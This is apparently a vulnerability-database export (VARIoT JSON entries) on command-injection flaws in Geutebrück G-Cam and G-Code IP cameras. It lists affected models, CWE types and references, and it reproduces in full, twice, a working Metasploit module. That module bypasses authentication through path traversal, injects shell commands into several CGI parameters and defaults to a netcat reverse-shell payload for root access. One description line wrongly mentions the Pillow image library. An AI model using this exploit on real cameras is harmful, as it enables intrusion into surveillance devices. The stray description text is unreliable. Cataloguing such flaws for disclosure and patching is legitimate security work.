\u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33552",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "id": "VAR-202109-0848",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:38:18.392000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158065"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.343000",
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.190000",
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0597

    Vulnerability from variot - Updated: 2025-01-30 21:21

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0597",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
